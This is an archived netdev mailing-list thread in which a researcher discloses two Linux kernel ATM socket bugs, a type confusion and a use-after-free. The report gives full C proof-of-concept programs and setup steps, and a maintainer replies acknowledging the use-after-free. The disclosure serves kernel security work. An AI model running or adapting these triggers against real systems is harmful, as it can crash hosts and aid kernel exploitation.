netdev.vger.kernel.org archive mirror
 help / color / mirror / Atom feed
* Two bugs report
@ 2020-04-27 13:15 Gengming Liu
  2020-05-01  5:46 ` Cong Wang
  0 siblings, 1 reply; 2+ messages in thread
From: Gengming Liu @ 2020-04-27 13:15 UTC (permalink / raw)
  To: netdev

We found two security bugs in the linux kernel and here's the
description of the bugs.

0.Build a testing environment
  a. Set up Ubuntu 19.04 in Vmware workstation.
  b. sudo apt install linux-image-5.0.0-21-generic.
  c. Change the grub default boot entry to 5.0.0-21-generic. (see
https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
cat /proc/version. If it is as following, it means you succeed.

"Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019"

  d. compile the poc by using gcc.
  e. Excute poc by "sudo ./poc"
  f. Use dmesg to check kernel message about crash.

1.atm_vcc_userback type confusion

atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
types of structures.

To trigger this bug it requires CAP_NET_ADMIN.(Use sudo ./poc)

The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
Proc version is:
Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019

Poc:
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>

int main(int argc, char const *argv[])
{
int fd;
fd = socket(0x14,3,0);
ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL

unsigned long long arg = 1;
ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP

char buffer[] =
"\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
setsockopt(fd,0xe0c7, 0x80, buffer,0x16);

return 0;
}

2.use-after-free in lec_arp_clear_vccs.

UAF object: struct atm_vcc *vcc

vcc is a atm(AF_ATMSVC) socket.

To trigger this bug:

1. Create vcc socket #A and #B
2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
4. close socket #B
5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF

To trigger this bug it requires CAP_NET_ADMIN. (Use sudo ./poc)

The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
Proc version is:
Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
2019

Poc:
#include <linux/socket.h>
#include <linux/atmdev.h>
#include <linux/atmarp.h>
#include <linux/atmlec.h>
#include <linux/atmsvc.h>
#include <linux/atmmpc.h>
#include <linux/atmclip.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/uio.h>
#include <signal.h>
 #include <sys/mman.h>
#include <sys/prctl.h>

#include <sys/inotify.h>
#include <sys/types.h>          /* See NOTES */
#include <sys/socket.h>

//#include <linux/wireless.h>
#include <sys/types.h> /* See NOTES */
#include <sys/socket.h>
#include <linux/socket.h>
#include <sys/un.h>
#include <stdbool.h>
#include <netinet/in.h>
#define SOCK_PORT 10000
struct my_mmsghdr
{
struct msghdr msg_hdr; /* Message header */
unsigned int msg_len;  /* Number of bytes transmitted */
};

void *sendmmsg_client_func()
{
int sockfd2;
struct sockaddr_in *paddr;
char szbuff[2050];
int ret;

struct sockaddr_in local_addr;
local_addr.sin_port = htons(SOCK_PORT /*+ getpid()*/);
local_addr.sin_addr.s_addr = inet_addr("127.0.0.1");
local_addr.sin_family = AF_INET;

memset(szbuff, 0x2b, 2048);

sockfd2 = socket(AF_INET, SOCK_DGRAM, 0);
paddr = &local_addr;

while (0 < connect(sockfd2, paddr, sizeof(*paddr)))
{
perror("connect");
usleep(11);
}

struct msghdr msg;
struct my_mmsghdr mmsg;

struct iovec vec;

vec.iov_base = szbuff;
vec.iov_len = 1;

msg.msg_name = paddr;
msg.msg_namelen = sizeof(*paddr);
msg.msg_iov = &vec;
msg.msg_iovlen = 1;
msg.msg_control = szbuff;
msg.msg_controllen = 2048;
msg.msg_flags = 0;

mmsg.msg_hdr = msg;
mmsg.msg_len = 1;


ret = syscall(__NR_sendmmsg, sockfd2, &mmsg, 1, 0);
if (ret < 0)
{
perror("sendmmsg");
}

}
void force_loop(){
/* code */
int sockB,sockA;
int dev = 3;
struct atmlec_ioc ioc_data;


sockB = socket(0x14, 0x2, 0x0);


sockA = socket(0x14, 0x2, 0x0);

ioctl(sockA, ATMLEC_CTRL, dev);

ioc_data.dev_num = dev;
ioc_data.receive = 1;
ioctl(sockB, ATMLEC_DATA, &ioc_data);

close(sockB);
sendmmsg_client_func();

   close(sockA);

}


int main(int argc, char const *argv[])
{
force_loop();


return 0;
}

^ permalink raw reply	[flat|nested] 2+ messages in thread
* Re: Two bugs report
  2020-04-27 13:15 Two bugs report Gengming Liu
@ 2020-05-01  5:46 ` Cong Wang
  0 siblings, 0 replies; 2+ messages in thread
From: Cong Wang @ 2020-05-01  5:46 UTC (permalink / raw)
  To: Gengming Liu; +Cc: Linux Kernel Network Developers

On Mon, Apr 27, 2020 at 6:16 AM Gengming Liu <l.dmxcsnsbh@gmail.com> wrote:
>
> We found two security bugs in the linux kernel and here's the
> description of the bugs.
>
> 0.Build a testing environment
>   a. Set up Ubuntu 19.04 in Vmware workstation.
>   b. sudo apt install linux-image-5.0.0-21-generic.
>   c. Change the grub default boot entry to 5.0.0-21-generic. (see
> https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
> cat /proc/version. If it is as following, it means you succeed.
>
> "Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019"
>
>   d. compile the poc by using gcc.
>   e. Excute poc by "sudo ./poc"
>   f. Use dmesg to check kernel message about crash.
>
> 1.atm_vcc_userback type confusion
>
> atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
> types of structures.
>
> To trigger this bug it requires CAP_NET_ADMIN.(Use sudo ./poc)
>
> The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
> Proc version is:
> Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019
>
> Poc:
> #include <linux/socket.h>
> #include <linux/atmdev.h>
> #include <linux/atmarp.h>
> #include <linux/atmlec.h>
> #include <linux/atmsvc.h>
> #include <linux/atmmpc.h>
> #include <linux/atmclip.h>
>
> int main(int argc, char const *argv[])
> {
> int fd;
> fd = socket(0x14,3,0);
> ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL
>
> unsigned long long arg = 1;
> ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
> ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP
>
> char buffer[] =
> "\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
> setsockopt(fd,0xe0c7, 0x80, buffer,0x16);

What is this setsockopt() for? I don't connect it to user_back.

The ATM code checks for user_back before using, for example,

        if (cmd != ATM_SETBACKEND && atmvcc->push != pppoatm_push)
                return -ENOIOCTLCMD;



>
> return 0;
> }
>
> 2.use-after-free in lec_arp_clear_vccs.
>
> UAF object: struct atm_vcc *vcc
>
> vcc is a atm(AF_ATMSVC) socket.
>
> To trigger this bug:
>
> 1. Create vcc socket #A and #B
> 2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
> 3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
> 4. close socket #B
> 5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF

Yeah, good catch. I have a fix for this, will send it out shortly.

Thanks for the report!

^ permalink raw reply	[flat|nested] 2+ messages in thread
end of thread, other threads:[~2020-05-01  5:46 UTC | newest]

Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2020-04-27 13:15 Two bugs report Gengming Liu
2020-05-01  5:46 ` Cong Wang

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).